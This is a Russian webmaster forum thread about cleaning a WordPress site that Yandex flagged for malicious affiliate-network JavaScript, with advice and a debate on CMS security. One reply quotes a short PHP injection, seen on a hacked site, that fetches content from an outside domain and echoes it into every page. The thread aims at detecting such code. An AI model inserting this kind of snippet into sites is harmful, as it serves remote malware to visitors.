Вирус на сайте!

N1
На сайте с 14.06.2013
Offline
26
1672

Коллеги, обращаюсь за советом, так как зашел в тупик.

На одном из сайтов, которые я обслуживаю (сайт на Wordpress), Яндекс обнаружил вирус Mal/Badsrc-K: "на странице присутствует JavaScript-код блока партнерской сети traffbiz.ru. Во время его выполнения периодически происходит подгрузка вредоносного JavaScript-кода со стороннего сайта, который, в свою очередь, распространяет вредоносное ПО".

Как лечил:

1. скачал все файлы с сервера на комп, прогнал через антивирус

2. зараженные файлы заменил на новые из дистрибутива

3. проверил опять антивирусами (ESET, Avira) - ok

4. установил антивирусный плагин

Отправил заявку на повторную проверку - но увы... Яндекс по прежнему видит вирусы на двух страницах - главной, и странице одного из разделов...

Прогнал ссылки через virustotal.com - из всех вирусы видит только Yandex Safebrowsing (Malware site).

И вот теперь я в тупике - все известные мне способы борьбы с заразой я использовал, к сожалению, безуспешно. Так как с такой проблемой сталкиваюсь впервые, опыта еще нет.

Вопрос: что делать?

Заранее благодарен всем откликнувшимся, кто сталкивался с такой же бедой.

6666
На сайте с 10.01.2005
Offline
505
#1
nok123:
все известные мне способы борьбы с заразой я использовал

Попробуйте еще такое могучее средство как почитать прилепленный топик ;)

---------- Добавлено 14.06.2013 в 18:45 ----------

nok123:
установил антивирусный плагин

какой плагин?

nok123:
качал все файлы с сервера на комп, прогнал через антивирус

какой антивирус?

---------- Добавлено 14.06.2013 в 18:45 ----------

nok123:
проверил опять антивирусами (ESET, Avira) - ok

блин.. да это антивирусы для ПК а не для сервера...

---------- Добавлено 14.06.2013 в 18:46 ----------

nok123:
(сайт на Wordpress)

Какая версия?

Какой шаблон?

Какие плагины стоят?

Или Вам экстрасенс нужен?

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
WebJunior
На сайте с 11.06.2010
Offline
155
#2
nok123:
Прогнал ссылки через virustotal.com - из всех вирусы видит только Yandex Safebrowsing (Malware site).

А этот сервис тут причем? По ссылкам которые вы прогнали должны находится исполняемые файлы и архивы, которые сервис и проверяет.

Мой сайт на этом хостинге - https://tuthost.ua/?from=2558 / Верстаю шаблоны (темы с отзывами: https://searchengines.guru/ru/forum/763758, https://searchengines.guru/ru/forum/600404 ).
domen4you
На сайте с 08.03.2013
Offline
53
#3

я начитаюсь таких тем и вообще боюсь с паблик движками связываться, это нормально?)

6666
На сайте с 10.01.2005
Offline
505
#4

domen4you, очень зря. ВП 3.51 отличный движок в плане защищенности. А если еще чуть-чуть доработать, то вообще неубиваемый.

Только если Вы сами потом ставите холявный шаблон с инклюдами и дырявые никому не нужные плагины, то ни одна защита не поможет. Ни на каком движке. Или теряете пасс от ФТП. Или даете незнакомому дизайнеру доступ в С-панель.

---------- Добавлено 14.06.2013 в 21:20 ----------

Тут работает логика про еврейского портного. "Если я буду королем, то буду самым богатым королем. Так как все короли, а я еще буду немного шить".

Так же и с плагинами. Типа все на ВП, а у меня ВП и еще и плагин стоит, у меня ТИЦ будет до небес и ПР выше крыши. :) А на деле плагины - первая опасность.

K5
На сайте с 21.07.2010
Offline
209
#5

адрес покажите

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
WebGomel
На сайте с 29.10.2011
Offline
78
#6

nok123, последний раз, когда я встречал сайт с подобным вердиктом от Яндекса, код выглядел вот так:

<?php
$urlpurs="http://montraf.ru/8308/take.html";
$beecode=@file_get_contents ($urlpurs);
echo "$beecode";
?>

Где точно находился не помню, вроде в хедере шаблона, однако далеко не факт, что у вас он будет выглядеть точно так же.

Но вообще вас правильно все послали в прикреплённый топик. Найдёте вы код, удалите, дальше что? Через неделю ведь снова появится, если причину взлома не устраните.

Удалённый системный администратор ( https://remadmin.com )
N1
На сайте с 14.06.2013
Offline
26
#7
6666:

какой плагин?

Какая версия?
Какой шаблон?
Какие плагины стоят?

Спасибо всем откликнувшимся!

Версия WordPress 3.5.1

плагин Better WP Security (он не лечит, а устраняет пробелы в безопасности)

AntiVirus

SeVlad
На сайте с 03.11.2008
Offline
1609
#8
domen4you:
я начитаюсь таких тем и вообще боюсь с паблик движками связываться, это нормально?)

А на паблик-авто по паблик-дорогам ездить не страшно?

"Непаблик" может быть защищен только тем, что никому не известен его код (и он сам - неуловимый Джо ;)). Однако даже общие методы взлома очень даже могут его "вскрыть".

Паблик же тем и хорош, что в случае обнаружения дыры она латается (насколько оперативно - тут уж зависит от разработчиков и\или энтузиастов).

В отношении ВП на сегодня, в текущей версии (3.5.1) не обнаружено ни одной серьёзной проблемы безопасности ядра (ок, если и кто-то обнаружил, то в паблике этой инфы нет)

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
F
На сайте с 07.02.2006
Offline
64
#9
SeVlad:
В отношении ВП на сегодня, в текущей версии (3.5.1) не обнаружено ни одной серьёзной проблемы безопасности ядра

Тем не менее в плагинах дыр достаточно. А видели ли вы ВП без плагинов?

Нет смысла спорить о безопасности паблик\непаблик движков. Но первые из за своей распостраненности более подвержены атакам.

Если бы типичный злоумышленник атаковал один сайт, то я бы поставил на паблик движок, что он окажется менее уязвимым.

Но типичный злоумышленник сейчас, это скрипт-киддис который купил время на бот-сети и скрипты для взлома паблик движков и\или плагинов к ним. И он не взламывает сайт, он обшаривает 1000 сайтов из которых находит 2-3 уязвимых для данных скриптов.

Лечение сайтов от вирусов (http://fstrange.ru/coder/php/cure-joomla-phpshell.html) |Ремонт iPhone в Ростове (http://a-stor.ru/iphone/remont-iphone-5-v-rostove.html)
SeVlad
На сайте с 03.11.2008
Offline
1609
#10
fStrange:
Тем не менее в плагинах дыр достаточно.

Бывает. Но не так часто, как об этом трубит школота. Я говорю об официальном источнике, а не помойках, откуда эта самая школота и подбирает всякую гадость.

fStrange:
Но первые из за своей распостраненности более подвержены атакам.

Ветер дует потому что деревья качаются? :)

А может абсолютное число взломанных сайтов на паблике больше, чем на привате? Ессно! Но только потому что на привате один такой сайт (ну десяток), а на паблике - миллиарды. Будем говорить о корректности сравнения? ;)

fStrange:
Если бы типичный злоумышленник атаковал один сайт, то я бы поставил на паблик движок, что он окажется менее уязвимым.
Но типичный злоумышленник сейчас, это скрипт-киддис который купил время на бот-сети и скрипты для взлома паблик движков и\или плагинов к ним. И он не взламывает сайт, он обшаривает 1000 сайтов из которых находит 2-3 уязвимых для данных скриптов.

Тут +1

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий